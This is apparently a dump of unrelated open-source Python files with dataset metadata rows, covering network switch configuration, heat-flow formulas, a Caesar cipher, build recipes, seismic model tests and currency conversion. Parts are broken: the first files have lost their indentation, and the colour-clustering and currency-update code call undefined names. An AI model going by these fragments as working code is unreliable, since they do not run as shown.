command = None
if proposed_mode != existing_mode:
if proposed_mode == 'trunk':
command = 'switchport mode trunk'
elif proposed_mode == 'access':
command = 'switchport mode access'
if command:
commands.append(command)
if proposed_mode == 'access':
av_check = str(existing.get('access_vlan')) == str(proposed.get('access_vlan'))
if not av_check:
command = 'switchport access vlan {0}'.format(proposed.get('access_vlan'))
commands.append(command)
elif proposed_mode == 'trunk':
tv_check = existing.get('trunk_vlans_list') == proposed.get('trunk_vlans_list')
if not tv_check:
if proposed.get('allowed'):
command = 'switchport trunk allowed vlan {0}'.format(proposed.get('trunk_allowed_vlans'))
commands.append(command)
else:
existing_vlans = existing.get('trunk_vlans_list')
proposed_vlans = proposed.get('trunk_vlans_list')
vlans_to_add = set(proposed_vlans).difference(existing_vlans)
if vlans_to_add:
command = 'switchport trunk allowed vlan add {0}'.format(proposed.get('trunk_vlans'))
commands.append(command)
native_check = str(existing.get('native_vlan')) == str(proposed.get('native_vlan'))
if not native_check and proposed.get('native_vlan'):
command = 'switchport trunk native vlan {0}'.format(proposed.get('native_vlan'))
commands.append(command)
if commands:
commands.insert(0, 'interface ' + name)
return commands
def is_switchport_default(existing):
"""Determines if switchport has a default config based on mode
Args:
        existing (dict): existing switchport configuration from the Ansible module
Returns:
boolean: True if switchport has OOB Layer 2 config, i.e.
vlan 1 and trunk all and mode is access
"""
c1 = str(existing['access_vlan']) == '1'
c2 = str(existing['native_vlan']) == '1'
c3 = existing['trunk_vlans'] == '1-4094'
c4 = existing['mode'] == 'access'
default = c1 and c2 and c3 and c4
return default
def default_switchport_config(name):
commands = []
commands.append('interface ' + name)
commands.append('switchport mode access')
    commands.append('switchport access vlan 1')
commands.append('switchport trunk native vlan 1')
commands.append('switchport trunk allowed vlan all')
return commands
def vlan_range_to_list(vlans):
result = []
if vlans:
for part in vlans.split(','):
if part == 'none':
break
if '-' in part:
a, b = part.split('-')
a, b = int(a), int(b)
result.extend(range(a, b + 1))
else:
a = int(part)
result.append(a)
return numerical_sort(result)
return result
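# Example: vlan_range_to_list('1-3,5') -> ['1', '2', '3', '5'] (numerical_sort
# returns the vlans as numerically sorted strings); a value of 'none' yields [].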
def get_list_of_vlans(module):
command = 'show vlan | json'
vlan_list = []
try:
body = run_commands(module, [command])[0]
vlan_table = body['TABLE_vlanbrief']['ROW_vlanbrief']
except (KeyError, AttributeError, IndexError):
return []
if isinstance(vlan_table, list):
for vlan in vlan_table:
vlan_list.append(str(vlan['vlanshowbr-vlanid-utf']))
else:
vlan_list.append('1')
return vlan_list
def numerical_sort(string_int_list):
"""Sorts list of strings/integers that are digits in numerical order.
"""
as_int_list = []
as_str_list = []
for vlan in string_int_list:
as_int_list.append(int(vlan))
as_int_list.sort()
for vlan in as_int_list:
as_str_list.append(str(vlan))
return as_str_list
def apply_key_map(key_map, table):
new_dict = {}
for key, value in table.items():
new_key = key_map.get(key)
if new_key:
new_dict[new_key] = str(value)
return new_dict
def apply_value_map(value_map, resource):
for key, value in value_map.items():
resource[key] = value[resource.get(key)]
return resource
def flatten_list(command_lists):
flat_command_list = []
for command in command_lists:
if isinstance(command, list):
flat_command_list.extend(command)
else:
flat_command_list.append(command)
return flat_command_list
def map_params_to_obj(module):
obj = []
aggregate = module.params.get('aggregate')
if aggregate:
for item in aggregate:
for key in item:
if item.get(key) is None:
item[key] = module.params[key]
d = item.copy()
obj.append(d)
else:
obj.append({
'name': module.params['name'],
'mode': module.params['mode'],
'access_vlan': module.params['access_vlan'],
'native_vlan': module.params['native_vlan'],
'trunk_vlans': module.params['trunk_vlans'],
'trunk_allowed_vlans': module.params['trunk_allowed_vlans'],
'state': module.params['state']
})
return obj
def main():
""" main entry point for module execution
"""
element_spec = dict(
name=dict(type='str', aliases=['interface']),
mode=dict(choices=['access', 'trunk']),
access_vlan=dict(type='str'),
native_vlan=dict(type='str'),
trunk_vlans=dict(type='str', aliases=['trunk_add_vlans']),
trunk_allowed_vlans=dict(type='str'),
state=dict(choices=['absent', 'present', 'unconfigured'], default='present')
)
aggregate_spec = deepcopy(element_spec)
# remove default in aggregate spec, to handle common arguments
remove_default_spec(aggregate_spec)
argument_spec = dict(
aggregate=dict(type='list', elements='dict', options=aggregate_spec),
)
argument_spec.update(element_spec)
argument_spec.update(nxos_argument_spec)
module = AnsibleModule(argument_spec=argument_spec,
mutually_exclusive=[['access_vlan', 'trunk_vlans'],
['access_vlan', 'native_vlan'],
['access_vlan', 'trunk_allowed_vlans']],
supports_check_mode=True)
warnings = list()
commands = []
result = {'changed': False}
if warnings:
result['warnings'] = warnings
want = map_params_to_obj(module)
for w in want:
name = w['name']
mode = w['mode']
access_vlan = w['access_vlan']
state = w['state']
trunk_vlans = w['trunk_vlans']
native_vlan = w['native_vlan']
trunk_allowed_vlans = w['trunk_allowed_vlans']
args = dict(name=name, mode=mode, access_vlan=access_vlan,
native_vlan=native_vlan, trunk_vlans=trunk_vlans,
trunk_allowed_vlans=trunk_allowed_vlans)
proposed = dict((k, v) for k, v in args.items() if v is not None)
name = name.lower()
if mode == 'access' and state == 'present' and not access_vlan:
module.fail_json(msg='access_vlan param is required when mode=access && state=present')
if mode == 'trunk' and access_vlan:
module.fail_json(msg='access_vlan param not supported when using mode=trunk')
current_mode = get_interface_mode(name, module)
# Current mode will return layer3, layer2, or unknown
if current_mode == 'unknown' or current_mode == 'layer3':
module.fail_json(msg='Ensure interface is configured to be a L2'
'\nport first before using this module. You can use'
'\nthe nxos_interface module for this.')
if interface_is_portchannel(name, module):
module.fail_json(msg='Cannot change L2 config on physical '
'\nport because it is in a portchannel. '
'\nYou should update the portchannel config.')
# existing will never be null for Eth intfs as there is always a default
existing = get_switchport(name, module)
# Safeguard check
# If there isn't an existing, something is wrong per previous comment
if not existing:
module.fail_json(msg='Make sure you are using the FULL interface name')
if trunk_vlans or trunk_allowed_vlans:
if trunk_vlans:
trunk_vlans_list = vlan_range_to_list(trunk_vlans)
elif trunk_allowed_vlans:
trunk_vlans_list = vlan_range_to_list(trunk_allowed_vlans)
proposed['allowed'] = True
existing_trunks_list = vlan_range_to_list((existing['trunk_vlans']))
existing['trunk_vlans_list'] = existing_trunks_list
proposed['trunk_vlans_list'] = trunk_vlans_list
current_vlans = get_list_of_vlans(module)
if state == 'present':
if access_vlan and access_vlan not in current_vlans:
module.fail_json(msg='You are trying to configure a VLAN'
' on an interface that\ndoes not exist on the '
' switch yet!', vlan=access_vlan)
elif native_vlan and native_vlan not in current_vlans:
module.fail_json(msg='You are trying to configure a VLAN'
' on an interface that\ndoes not exist on the '
' switch yet!', vlan=native_vlan)
else:
command = get_switchport_config_commands(name, existing, proposed, module)
commands.append(command)
elif state == 'unconfigured':
is_default = is_switchport_default(existing)
if not is_default:
command = default_switchport_config(name)
commands.append(command)
elif state == 'absent':
command = remove_switchport_config_commands(name, existing, proposed, module)
commands.append(command)
if trunk_vlans or trunk_allowed_vlans:
existing.pop('trunk_vlans_list')
proposed.pop('trunk_vlans_list')
cmds = flatten_list(commands)
if cmds:
if module.check_mode:
module.exit_json(changed=True, commands=cmds)
else:
result['changed'] = True
load_config(module, cmds)
if 'configure' in cmds:
cmds.pop(0)
result['commands'] = cmds
result['warnings'] = warnings
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 | 1,847,182,583,090,040,300 | 32.1019 | 117 | 0.600751 | false |
HUGG/NGWM2016-modelling-course | Lessons/05-Finite-differences/scripts/solutions/analytical_solutions.py | 2 | 1039 | import numpy as np
import matplotlib.pyplot as plt
import math
def analytical_tr(T0, T1, kappa, t, z):
z = np.array(z) # to make sure it's an array
T = np.zeros(z.size)
for iz in range(z.size):
T[iz] = math.erfc(z[iz] / (2.0 * (kappa * t)**0.5)) * (T0 - T1) + T1
return T
def analytical_ss_qT(z, k, A, z1, q0, z2, T0):
### Calculate the analytical solution of the heat equation
# * Steady-state
# * No advection
# * Constant heat conductivity
# * Constant heat production
#
# Choosable Dirichlet + von Neumann boundary conditions
    # q=q0 at z=z1
    # T=T0 at z=z2
# k: heat conductivity, W/mK
# A: heat production rate, W/m^3
    # z1, q0: location and value of boundary condition one (von Neumann)
    # z2, T0: location and value of boundary condition two (Dirichlet)
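    # Derivation sketch for the constants computed below: with
    #   T(z) = (-0.5*A*z**2 + Ca*z + Cb) / k
    # the heat flow is q(z) = k*dT/dz = -A*z + Ca, so q(z1) = q0 gives
    #   Ca = q0 + A*z1
    # and T(z2) = T0 gives
    #   Cb = k*T0 + 0.5*A*z2**2 - Ca*z2
    #      = -q0*z2 - A*z1*z2 + k*T0 + 0.5*A*z2**2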
# Calculate integration constants
Ca = q0 + A*z1
Cb = -q0 * z2 - A*z1*z2 + k*T0 + 0.5*A*z2**2
### Evaluate temperature at chosen range
T = (- 0.5 * A * z**2 + Ca*z + Cb) / k
return T
| mit | 392,589,402,827,973,440 | 24.975 | 72 | 0.607315 | false |
matteli/histemul | server/src/histemul_server.py | 1 | 4545 | #!/usr/bin/python3
'''
Copyright (c) 2012-2015, Matthieu Nué
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
THE POSSIBILITY OF SUCH DAMAGE.
'''
import datetime
from flask import Flask, request, Response
from bson.objectid import ObjectId
from engine import Engine
try:
import simplejson as json
except ImportError:
try:
import json
except ImportError:
raise ImportError
class MongoJsonEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, (datetime.datetime, datetime.date)):
return obj.isoformat()
elif isinstance(obj, ObjectId):
return str(obj)
return json.JSONEncoder.default(self, obj)
def jsonify(*args):
""" jsonify with support for MongoDB ObjectId
"""
return Response(json.dumps(*args, cls=MongoJsonEncoder), mimetype='application/json')
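# Illustrative use: jsonify({'_id': ObjectId('5f1d7a2b9c3e4a0012345678'),
# 'when': datetime.date(2015, 1, 1)}) returns a JSON response with the
# ObjectId rendered as its hex string and the date as '2015-01-01'.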
app = Flask(__name__)
engine = Engine(True, True)
#engine = Engine()
engine.start()
@app.route('/', methods=['GET', 'POST'])
def requesting():
"""
    Requests from the client arrive here.
"""
if request.method == 'POST':
if request.is_json:
requestjs = request.get_json()
player = requestjs['player']
typerq = requestjs['type']
print(requestjs)
if typerq == 'get' or typerq == 'get_all':
cls = requestjs['cls']
atts = requestjs['atts']
idd = requestjs['id']
return jsonify(engine.model.get_in_model(typerq, player, cls, atts, idd))
elif typerq == 'get_status' or typerq == 'post_msg':
response = {}
prop = requestjs['prop']
if not engine.update_flag_global.is_set():
if typerq == 'get_status':
response[prop] = 'disabled'
else:
response[prop] = 'rejected'
msg = requestjs['msg']
opt = requestjs['opt']
print(opt)
idd = requestjs['id']
'''if player in engine.model.orders and engine.model.orders[player] and (msg, idd) in engine.model.orders[player][0]:
if type == 'get_status':
response[prop] = 'accepted'
else:
response[prop] = 'rejected'
else:
if type == 'get_status':
result = engine.model.make_orders(player, msg, idd, opt, 'test')
else:
result = engine.model.make_orders(player, msg, idd, opt, 'order')
response[prop] = result'''
return jsonify(engine.model.post_in_model(prop, typerq, player, msg, opt, idd))
elif typerq == 'get_update':
response = {}
prop = requestjs['prop']
num = requestjs['num']
if num == 0:
engine.update_flag_global.wait()
else:
engine.update_flag_tick[num%2].wait()
response[prop] = engine.tick
return jsonify(response)
elif typerq == 'get_in_function':
response = {}
func = requestjs['func']
opts = requestjs['opts']
if func == 'player_person_title':
response = engine.model.get_player_person_title(player, opts)
return jsonify(response)
return jsonify({})
| bsd-2-clause | -5,707,369,261,130,986,000 | 35.645161 | 129 | 0.616197 | false |
gregbdunn/aws-ec2rescue-linux | lib/botocore/docs/client.py | 5 | 4673 | # Copyright 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import inspect
from botocore.docs.utils import get_official_service_name
from botocore.docs.method import document_custom_method
from botocore.docs.method import document_model_driven_method
from botocore.docs.method import get_instance_public_methods
from botocore.docs.sharedexample import document_shared_examples
class ClientDocumenter(object):
def __init__(self, client, shared_examples=None):
self._client = client
self._shared_examples = shared_examples
if self._shared_examples is None:
self._shared_examples = {}
self._service_name = self._client.meta.service_model.service_name
def document_client(self, section):
"""Documents a client and its methods
:param section: The section to write to.
"""
self._add_title(section)
self._add_class_signature(section)
client_methods = get_instance_public_methods(self._client)
self._add_client_intro(section, client_methods)
self._add_client_methods(section, client_methods)
def _add_title(self, section):
section.style.h2('Client')
def _add_client_intro(self, section, client_methods):
section = section.add_new_section('intro')
# Write out the top level description for the client.
official_service_name = get_official_service_name(
self._client.meta.service_model)
section.write(
'A low-level client representing %s' % official_service_name)
# Write out the client example instantiation.
self._add_client_creation_example(section)
# List out all of the possible client methods.
section.style.new_line()
section.write('These are the available methods:')
section.style.new_line()
class_name = self._client.__class__.__name__
for method_name in sorted(client_methods):
section.style.li(':py:meth:`~%s.Client.%s`' % (
class_name, method_name))
def _add_class_signature(self, section):
section.style.start_sphinx_py_class(
class_name='%s.Client' % self._client.__class__.__name__)
def _add_client_creation_example(self, section):
section.style.start_codeblock()
section.style.new_line()
section.write(
'client = session.create_client(\'{service}\')'.format(
service=self._service_name)
)
section.style.end_codeblock()
def _add_client_methods(self, section, client_methods):
section = section.add_new_section('methods')
for method_name in sorted(client_methods):
self._add_client_method(
section, method_name, client_methods[method_name])
def _add_client_method(self, section, method_name, method):
section = section.add_new_section(method_name)
if self._is_custom_method(method_name):
self._add_custom_method(section, method_name, method)
else:
self._add_model_driven_method(section, method_name)
def _is_custom_method(self, method_name):
return method_name not in self._client.meta.method_to_api_mapping
def _add_custom_method(self, section, method_name, method):
document_custom_method(section, method_name, method)
def _add_model_driven_method(self, section, method_name):
service_model = self._client.meta.service_model
operation_name = self._client.meta.method_to_api_mapping[method_name]
operation_model = service_model.operation_model(operation_name)
example_prefix = 'response = client.%s' % method_name
document_model_driven_method(
section, method_name, operation_model,
event_emitter=self._client.meta.events,
method_description=operation_model.documentation,
example_prefix=example_prefix,
)
# Add the shared examples
shared_examples = self._shared_examples.get(operation_name)
if shared_examples:
document_shared_examples(
section, operation_model, example_prefix, shared_examples)
| apache-2.0 | 5,520,618,138,621,459,000 | 40.353982 | 77 | 0.662529 | false |
Reiuiji/Network-Security-Programs | HW code/HW2 Cryptography: Classic Ciphers/CaesarCipher.py | 1 | 1732 | #Dan N
# HW 2: Caesar Cipher Utility
#Dependent: argparse
import os
import sys
import argparse
#input Parser
parser = argparse.ArgumentParser(description='HW 2 Caesar Cipher')
parser.add_argument("-i", "--input", dest='INPUT', help="Input File")
parser.add_argument("-o", "--output", dest='OUTPUT', help="Output File")
parser.add_argument("-b", "--basechar", dest='BASECHAR', help="Base Shift Char")
parser.add_argument("-s", "--shiftchar", dest='SHIFTCHAR', help="Shifted Char")
parser.add_argument("-l", "--loopmode", dest='LOOP', help="Enable Caesar Loop", action='store_true')
args = parser.parse_args()
if not args.BASECHAR:
args.BASECHAR = raw_input("Base Character: ")
if not args.SHIFTCHAR:
args.SHIFTCHAR = raw_input("Shift Character: ")
if not args.INPUT:
INPUT = raw_input("Message: ")
else:
if os.path.isfile(args.INPUT):
f = open(args.INPUT, 'r')
INPUT = f.read()
f.close()
else:
print("Input File Does not Exist")
sys.exit()
if args.LOOP:
LOOP = args.LOOP
else:
LOOP = False
def CaesarCipher(PlainText,Shift):
CipherText = ""
for Char in PlainText:
if Char.isalpha():
A = ord(Char) + Shift
if Char.islower():
if A > ord('z'):
A -= 26
else:
if A > ord('Z'):
A -= 26
CipherText += chr(A)
else:
CipherText += Char
return CipherText
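# Example: CaesarCipher("Hello", 3) returns "Khoor"; non-alphabetic characters
# are passed through unchanged.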
#Calculate the shift
Shift=ord(args.SHIFTCHAR.lower()) - ord(args.BASECHAR.lower())
if Shift < 0:
Shift += 26
elif Shift > 26:
Shift -= 26
if LOOP == False:
CaesarOutput = CaesarCipher(INPUT, Shift)
#Write Output
if not args.OUTPUT:
print(CaesarOutput)
else:
        f = open(args.OUTPUT, 'w')
f.write(CaesarOutput)
f.close()
else:
for a in range(26):
CaesarOutput = CaesarCipher(INPUT, a)
print(CaesarOutput)
| mit | -7,607,492,792,445,671,000 | 22.093333 | 100 | 0.667436 | false |
pescobar/easybuild-easyblocks | easybuild/easyblocks/j/java.py | 1 | 2662 | ##
# Copyright 2012-2019 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# https://github.com/easybuilders/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBlock for installing Java, implemented as an easyblock
@author: Jens Timmerman (Ghent University)
@author: Kenneth Hoste (Ghent University)
"""
import os
import stat
from distutils.version import LooseVersion
from easybuild.easyblocks.generic.packedbinary import PackedBinary
from easybuild.tools.filetools import adjust_permissions, change_dir, copy_dir, copy_file, remove_dir
from easybuild.tools.run import run_cmd
class EB_Java(PackedBinary):
"""Support for installing Java as a packed binary file (.tar.gz)
Use the PackedBinary easyblock and set some extra paths.
"""
def extract_step(self):
"""Unpack the source"""
if LooseVersion(self.version) < LooseVersion('1.7'):
copy_file(self.src[0]['path'], self.builddir)
adjust_permissions(os.path.join(self.builddir, self.src[0]['name']), stat.S_IXUSR, add=True)
change_dir(self.builddir)
run_cmd(os.path.join(self.builddir, self.src[0]['name']), log_all=True, simple=True, inp='')
else:
PackedBinary.extract_step(self)
def install_step(self):
if LooseVersion(self.version) < LooseVersion('1.7'):
remove_dir(self.installdir)
copy_dir(os.path.join(self.builddir, 'jdk%s' % self.version), self.installdir)
else:
PackedBinary.install_step(self)
def make_module_extra(self):
"""
Set JAVA_HOME to install dir
"""
txt = PackedBinary.make_module_extra(self)
txt += self.module_generator.set_environment('JAVA_HOME', self.installdir)
return txt
| gpl-2.0 | 5,134,567,485,933,697,000 | 36.492958 | 104 | 0.697596 | false |
frodo4fingers/swico | dominant_colour.py | 1 | 1649 | # import Image
import sys
def average_colour(image):
colour_tuple = [None, None, None]
for channel in range(3):
# Get data for one channel at a time
pixels = image.getdata(band=channel)
values = []
for pixel in pixels:
values.append(pixel)
colour_tuple[channel] = sum(values) / len(values)
return tuple([int(i) for i in colour_tuple])
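# Illustrative result: for a solid red image average_colour() returns
# (255, 0, 0); in general it is the per-channel mean cast to int.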
def most_frequent_colour(image):
w, h = image.size
pixels = image.getcolors(w * h)
most_frequent_pixel = pixels[0]
for count, colour in pixels:
if count > most_frequent_pixel[0]:
most_frequent_pixel = (count, colour)
return most_frequent_pixel[1]
def average_colour_in_k_clusters(image, k):
pass
def compare(title, image, colour_tuple):
image.show(title=title)
image = Image.new("RGB", (200, 200,), colour_tuple)
return image
def kmeans(pixels, k):
numFeatures = len(pixels)
centroids = getRandomCentroids(numFeatures, k)
iterations = 0
oldCentroids = None
while not shouldStop(oldCentroids, centroids, iterations):
oldCentroids = centroids
        iterations += 1
def save(name, result, image):
image.save("images/results/{}.jpg".format(name))
sample = Image.new("RGB", (200, 200,), result)
sample.save("images/results/{}-result.jpg".format(name))
def main():
image = Image.open("images/DSC_6883.jpg")
if "mode" in sys.argv:
result = most_frequent_colour(image)
if "ave" in sys.argv:
result = average_colour(image)
save("Wheatbelt", result, image)
if __name__ == "__main__":
main()
| mit | 7,902,813,109,505,295,000 | 19.358025 | 62 | 0.622802 | false |
gem/oq-engine | openquake/hazardlib/tests/gsim/si_midorikawa_1999_test.py | 1 | 4478 | # -*- coding: utf-8 -*-
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (C) 2013-2021 GEM Foundation
#
# OpenQuake is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# OpenQuake is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with OpenQuake. If not, see <http://www.gnu.org/licenses/>.
from openquake.hazardlib.gsim.si_midorikawa_1999 import SiMidorikawa1999Asc, \
SiMidorikawa1999SInter, SiMidorikawa1999SSlab, \
SiMidorikawa1999SInterNorthEastCorrection, \
SiMidorikawa1999SSlabNorthEastCorrection, \
SiMidorikawa1999SInterSouthWestCorrection, \
SiMidorikawa1999SSlabSouthWestCorrection
from openquake.hazardlib.tests.gsim.utils import BaseGSIMTestCase
# test data was generated using alternative implementation of GMPE.
class SiMidorikawa1999AscTestCase(BaseGSIMTestCase):
GSIM_CLASS = SiMidorikawa1999Asc
def test_mean(self):
self.check('SM99/SM99ASC_MEAN.csv', max_discrep_percentage=0.1)
def test_mean_pga(self):
self.check('SM99/SM99ASC_MEAN_PGA.csv', max_discrep_percentage=0.1)
def test_mean_pga_vs800(self):
self.check('SM99/SM99ASC_MEAN_PGA_vs800.csv', max_discrep_percentage=0.1)
def test_total_stddev(self):
self.check('SM99/SM99ASC_STD_TOTAL.csv', max_discrep_percentage=0.1)
class SiMidorikawa1999SInterTestCase(BaseGSIMTestCase):
GSIM_CLASS = SiMidorikawa1999SInter
def test_mean(self):
self.check('SM99/SM99SInter_MEAN.csv', max_discrep_percentage=0.1)
def test_total_stddev(self):
self.check('SM99/SM99SInter_STD_TOTAL.csv', max_discrep_percentage=0.1)
class SiMidorikawa1999SInterNECorrTestCase(BaseGSIMTestCase):
GSIM_CLASS = SiMidorikawa1999SInterNorthEastCorrection
def test_mean(self):
self.check(
'SM99/SM99SInterNECorr_MEAN.csv', max_discrep_percentage=0.1
)
def test_mean_pga(self):
self.check(
'SM99/SM99SInterNECorr_MEAN_PGA.csv', max_discrep_percentage=0.1
)
def test_total_stddev(self):
self.check(
'SM99/SM99SInterNECorr_STD_TOTAL.csv', max_discrep_percentage=0.1
)
class SiMidorikawa1999SInterSWCorrTestCase(BaseGSIMTestCase):
GSIM_CLASS = SiMidorikawa1999SInterSouthWestCorrection
def test_mean(self):
self.check(
'SM99/SM99SInterSWCorr_MEAN.csv', max_discrep_percentage=0.1
)
def test_mean_pga(self):
self.check(
'SM99/SM99SInterSWCorr_MEAN_PGA.csv', max_discrep_percentage=0.1
)
def test_total_stddev(self):
self.check(
'SM99/SM99SInterSWCorr_STD_TOTAL.csv', max_discrep_percentage=0.1
)
class SiMidorikawa1999SSlabTestCase(BaseGSIMTestCase):
GSIM_CLASS = SiMidorikawa1999SSlab
def test_mean(self):
self.check('SM99/SM99SSlab_MEAN.csv', max_discrep_percentage=0.1)
def test_total_stddev(self):
self.check('SM99/SM99SSlab_STD_TOTAL.csv', max_discrep_percentage=0.1)
class SiMidorikawa1999SSlabNECorrTestCase(BaseGSIMTestCase):
GSIM_CLASS = SiMidorikawa1999SSlabNorthEastCorrection
def test_mean(self):
self.check(
'SM99/SM99SSlabNECorr_MEAN.csv', max_discrep_percentage=0.1
)
def test_mean_pga(self):
self.check(
'SM99/SM99SSlabNECorr_MEAN_PGA.csv', max_discrep_percentage=0.1
)
def test_total_stddev(self):
self.check(
'SM99/SM99SSlabNECorr_STD_TOTAL.csv', max_discrep_percentage=0.1
)
class SiMidorikawa1999SSlabSWCorrTestCase(BaseGSIMTestCase):
GSIM_CLASS = SiMidorikawa1999SSlabSouthWestCorrection
def test_mean(self):
self.check(
'SM99/SM99SSlabSWCorr_MEAN.csv', max_discrep_percentage=0.1
)
def test_mean_pga(self):
self.check(
'SM99/SM99SSlabSWCorr_MEAN_PGA.csv', max_discrep_percentage=0.1
)
def test_total_stddev(self):
self.check(
'SM99/SM99SSlabSWCorr_STD_TOTAL.csv', max_discrep_percentage=0.1
)
| agpl-3.0 | 553,797,299,080,955,140 | 31.215827 | 81 | 0.700313 | false |
markbrough/exchangerates | exchangerates/__init__.py | 1 | 3564 | from bisect import bisect_left
import csv
import datetime
import pkg_resources
from six import next
from . import get_rates
class UnknownCurrencyException(Exception):
pass
def make_date_from_iso(iso_str):
year = int(iso_str[:4])
month = int(iso_str[5:7])
day = int(iso_str[8:10])
return datetime.date(year, month, day)
def take_closest(myList, myNumber):
# Source: http://stackoverflow.com/a/12141511
"""
Assumes myList is sorted. Returns closest value to myNumber.
If two numbers are equally close, return the smallest number.
"""
pos = bisect_left(myList, myNumber)
if pos == 0:
return myList[0]
if pos == len(myList):
return myList[-1]
before = myList[pos - 1]
after = myList[pos]
if after - myNumber < myNumber - before:
return after
else:
return before
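# Example: take_closest([1, 4, 10], 6) returns 4 (4 is 2 away, 10 is 4 away;
# on a tie the smaller value is returned).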
class CurrencyConverter(object):
def __init__(self, update=False, source=False):
def load_rates():
"""
Read CSV file as generator function
"""
if self.source is False:
resource_package = __name__
resource_path = 'consolidated_rates.csv'
                self.source = pkg_resources.resource_filename(
resource_package, resource_path)
if update is True:
                get_rates.update_rates(self.source)
with open(self.source, "rU") as data:
csv_reader = csv.reader(data)
next(csv_reader)
for row in csv_reader:
yield row
def make_rates(rates_list):
"""
Sort rates into nice dictionary of currency: dates
"""
def append_path(root, paths):
root.setdefault(paths[0], {})
root[paths[0]].update(paths[1])
return root
rates_dates = {}
for row in rates_list:
rates_dates = append_path(
rates_dates,
(row[2], {make_date_from_iso(row[0]): float(row[1])}))
currencies_dates = dict(map(lambda currency:
(currency, sorted(list(rates_dates[currency]))),
rates_dates.keys()))
return currencies_dates, rates_dates
self.source = source
self.currencies_dates, self.dates_rates = make_rates(load_rates())
def known_currencies(self):
return ",".join(sorted(self.currencies_dates.keys()))
def closest_rate(self, currency, date):
"""
        Accepts a currency code and a date;
        returns a dict with the closest available date and the conversion rate
"""
if currency == u"USD":
return {"closest_date": date, "conversion_rate": 1.0}
try:
the_date = take_closest(self.currencies_dates[currency], date)
return {
"closest_date": the_date,
"conversion_rate": self.dates_rates[currency][the_date]
}
except KeyError:
msg = "Unknown currency: {}".format(currency)
raise UnknownCurrencyException(msg)
if __name__ == "__main__":
"""
Example output
"""
converter = CurrencyConverter(update=True)
print("Available currencies: {}".format(converter.known_currencies()))
print(converter.closest_rate("USD", datetime.date(2012, 7, 20)))
print(converter.closest_rate("EUR", datetime.date(2014, 7, 20)))
print(converter.closest_rate("EUR", datetime.date(2014, 7, 20)))
| mit | -6,793,993,681,324,983,000 | 30.821429 | 76 | 0.561167 | false |
fboender/jerrybuild | jerrybuild/bottle.py | 8 | 150580 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Bottle is a fast and simple micro-framework for small web applications. It
offers request dispatching (Routes) with url parameter support, templates,
a built-in HTTP Server and adapters for many third party WSGI/HTTP-server and
template engines - all in a single file and with no dependencies other than the
Python Standard Library.
Homepage and documentation: http://bottlepy.org/
Copyright (c) 2016, Marcel Hellkamp.
License: MIT (see LICENSE for details)
"""
from __future__ import with_statement
__author__ = 'Marcel Hellkamp'
__version__ = '0.12.18'
__license__ = 'MIT'
# The gevent server adapter needs to patch some modules before they are imported
# This is why we parse the commandline parameters here but handle them later
if __name__ == '__main__':
from optparse import OptionParser
_cmd_parser = OptionParser(usage="usage: %prog [options] package.module:app")
_opt = _cmd_parser.add_option
_opt("--version", action="store_true", help="show version number.")
_opt("-b", "--bind", metavar="ADDRESS", help="bind socket to ADDRESS.")
_opt("-s", "--server", default='wsgiref', help="use SERVER as backend.")
_opt("-p", "--plugin", action="append", help="install additional plugin/s.")
_opt("--debug", action="store_true", help="start server in debug mode.")
_opt("--reload", action="store_true", help="auto-reload on file changes.")
_cmd_options, _cmd_args = _cmd_parser.parse_args()
if _cmd_options.server and _cmd_options.server.startswith('gevent'):
import gevent.monkey; gevent.monkey.patch_all()
import base64, cgi, email.utils, functools, hmac, itertools, mimetypes,\
os, re, subprocess, sys, tempfile, threading, time, warnings, hashlib
from datetime import date as datedate, datetime, timedelta
